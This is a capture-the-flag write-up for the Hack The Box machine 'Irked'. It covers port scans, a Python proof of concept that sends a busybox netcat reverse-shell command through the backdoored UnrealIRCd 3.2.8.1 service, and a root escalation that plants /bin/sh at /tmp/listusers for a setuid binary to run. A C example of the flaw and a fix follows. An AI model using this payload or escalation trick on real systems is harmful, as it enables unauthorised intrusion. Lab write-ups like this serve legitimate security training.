HTB: Irked

Spoiler Summary

This Linux box is running a backdoored ircd. PE is possible via a poorly secured setuid binary.

Services

TCP

nmap TCP scan:

# Nmap 7.94SVN scan initiated Fri Jun 28 13:41:24 2024 as: nmap -v -sCV -p- -T4 --min-rate 10000 -oN nmap_tcp t
Warning: 10.10.10.117 giving up on port because retransmission cap hit (6).
Nmap scan report for t (10.10.10.117)
Host is up (0.100s latency).
Not shown: 65528 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          33795/udp6  status
|   100024  1          44609/udp   status
|   100024  1          53976/tcp   status
|_  100024  1          54469/tcp6  status
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
53976/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

80/tcp-http

The site:

$ curl http://irked.htb
<img src=irked.jpg>
<br>
<b><center>IRC is almost working!</b></center>

6697/tcp-irc

Irssi v1.4.5 - https://irssi.org
13:48 -!- Irssi: Looking up irked.htb
13:48 -!- Irssi: The following settings were initialized
13:48                        real_name
13:48 -!- Irssi: Connecting to irked.htb [10.10.10.117] port 6697
13:48 Waiting for CAP LS response...
13:48 -!- Irssi: Connection to irked.htb established
13:48 !irked.htb *** Looking up your hostname...
13:48 !irked.htb *** Couldn't resolve your hostname; using your IP address instead
13:48 -!- Welcome to the ROXnet IRC Network kali!kali@10.10.14.10
13:48 -!- Your host is irked.htb, running version Unreal3.2.8.1
13:48 -!- This server was created Mon May 14 2018 at 13:12:50 EDT
13:48 -!- irked.htb Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
13:48 -!- UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307
          KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 are supported by this server
13:48 -!- WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG
          NETWORK=ROXnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ are supported by this server
13:48 -!- EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP are supported by this server
13:48 -!- There are 1 users and 0 invisible on 1 servers
13:48 -!- I have 1 clients and 0 servers
13:48 -!- Current Local Users: 1  Max: 1
13:48 -!- Current Global Users: 1  Max: 1
13:48 -!- MOTD File is missing
13:48 -!- Mode change [+iwx] for user kali
13:48 -!- You may not reregister

The server identifies itself as Unreal3.2.8.1, the UnrealIRCd release whose distributed source tarball was trojaned with a backdoor that gives unauthenticated remote command execution.

111/tcp-rpcbind

$ sudo nmap -sSUC -p 111 t
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-28 14:31 CST
Nmap scan report for t (10.10.10.117)
Host is up (0.099s latency).
PORT    STATE SERVICE
111/tcp open  rpcbind
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          33795/udp6  status
|   100024  1          44609/udp   status
|   100024  1          53976/tcp   status
|_  100024  1          54469/tcp6  status
111/udp open  rpcbind
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          33795/udp6  status
|   100024  1          44609/udp   status
|   100024  1          53976/tcp   status
|_  100024  1          54469/tcp6  status
Nmap done: 1 IP address (1 host up) scanned in 15.34 seconds
$ rpcinfo irked.htb
   program version netid     address                service    owner
    100000    4    tcp6      ::.0.111               portmapper superuser
    100000    3    tcp6      ::.0.111               portmapper superuser
    100000    4    udp6      ::.0.111               portmapper superuser
    100000    3    udp6      ::.0.111               portmapper superuser
    100000    4    tcp       0.0.0.0.0.111          portmapper superuser
    100000    3    tcp       0.0.0.0.0.111          portmapper superuser
    100000    2    tcp       0.0.0.0.0.111          portmapper superuser
    100000    4    udp       0.0.0.0.0.111          portmapper superuser
    100000    3    udp       0.0.0.0.0.111          portmapper superuser
    100000    2    udp       0.0.0.0.0.111          portmapper superuser
    100000    4    local     /run/rpcbind.sock      portmapper superuser
    100000    3    local     /run/rpcbind.sock      portmapper superuser
    100024    1    udp       0.0.0.0.174.65         status     107
    100024    1    tcp       0.0.0.0.210.216        status     107
    100024    1    udp6      ::.132.3               status     107
    100024    1    tcp6      ::.212.197             status     107

RCE

Here's a modified version of this PoC:

import socket

ip = "10.10.10.117"
port = 6697
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.recv(1024)  # consume the server's initial notices before sending anything
# the trojaned build executes the text that follows the "AB;" marker
payload = b"AB;busybox nc 10.10.14.10 443 -e /bin/bash"
s.sendall(payload)
s.close()

The listener catches the callback as the ircd user:

connect to [10.10.14.10] from (UNKNOWN) [10.10.10.117] 38035
id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)

PE

First, I'll check for setuid executables:

ircd@irked:~$ find / -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/pkexec
/usr/bin/X
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount

The binary /usr/bin/viewuser stands out as atypical.

ircd@irked:~$ file /usr/bin/viewuser
/usr/bin/viewuser: setuid ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=69ba4bc75bf72037f1ec492bc4cde2550eeac4bb, not stripped
ircd@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2024-06-28 15:40 (:0)
ircd     pts/1        2024-06-28 16:23 (10.10.14.10)
ircd     pts/2        2024-06-28 17:08 (10.10.14.10)
sh: 1: /tmp/listusers: not found

It shells out to /tmp/listusers (the "sh: 1:" prefix shows the call goes through sh -c, i.e. system()), and that file doesn't exist. Since /tmp is world-writable, I can put a copy of /bin/sh there and the setuid-root binary will run it as root.

ircd@irked:~$ cp /bin/sh /tmp/listusers
ircd@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2024-06-28 15:40 (:0)
ircd     pts/1        2024-06-28 16:23 (10.10.14.10)
ircd     pts/2        2024-06-28 17:08 (10.10.14.10)
# id
uid=0(root) gid=1001(ircd) groups=1001(ircd)
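As an added illustration (not the box's viewuser source, which isn't available), the same setuid shell-out pattern in C beside the ownership check and privilege drop a setuid helper should apply before executing a path; the /tmp/listusers path comes from the page, the function names are hypothetical.

```c
/* Added example, not the box's viewuser source: the setuid shell-out pattern
 * it exhibits, and the check plus privilege drop a helper should use instead. */
#define _POSIX_C_SOURCE 200809L
#include <limits.h>
#include <libgen.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

/* The observed bug: setuid-root code runs a path under /tmp via system(). */
int vulnerable_listusers(void) {
    return system("/tmp/listusers");
}

/* 1 if path is a regular root-owned file, writable only by owner, inside a
 * root-owned directory that is not group/world-writable (so /tmp is rejected). */
int safe_to_exec(const char *path) {
    struct stat st, dst;
    char buf[PATH_MAX];
    if (stat(path, &st) != 0) return 0;           /* missing file is not safe */
    if (!S_ISREG(st.st_mode) || st.st_uid != 0) return 0;
    if (st.st_mode & (S_IWGRP | S_IWOTH)) return 0;
    strncpy(buf, path, sizeof buf - 1);
    buf[sizeof buf - 1] = '\0';
    if (stat(dirname(buf), &dst) != 0) return 0;
    if (!S_ISDIR(dst.st_mode) || dst.st_uid != 0) return 0;
    if (dst.st_mode & (S_IWGRP | S_IWOTH)) return 0;
    return 1;
}

/* Hardened launcher: refuse unsafe paths, then drop to the real uid/gid before
 * exec so the helper never runs as root. Returns exit status, or -1 on refusal. */
int run_helper_unprivileged(const char *path) {
    if (!safe_to_exec(path)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0) _exit(127);
        char *const argv[] = { (char *)path, NULL };
        execv(path, argv);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

Listing the helper's location as the box does (world-writable /tmp) fails the check, so the hardened launcher refuses it before fork; a root-owned helper under a root-owned directory passes.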

Open Questions

I got lost down a deep rpcbind rabbit hole. Is there something there?

Credits

I missed the setuid binary on my first pass, and spent two hours researching rpcbind. This writeup from snowscan is a little outdated--it looks like HTB changed the box since it was written, e.g. /home/djmardov/.backup no longer exists. But, it still helped point me in the right direction for PE.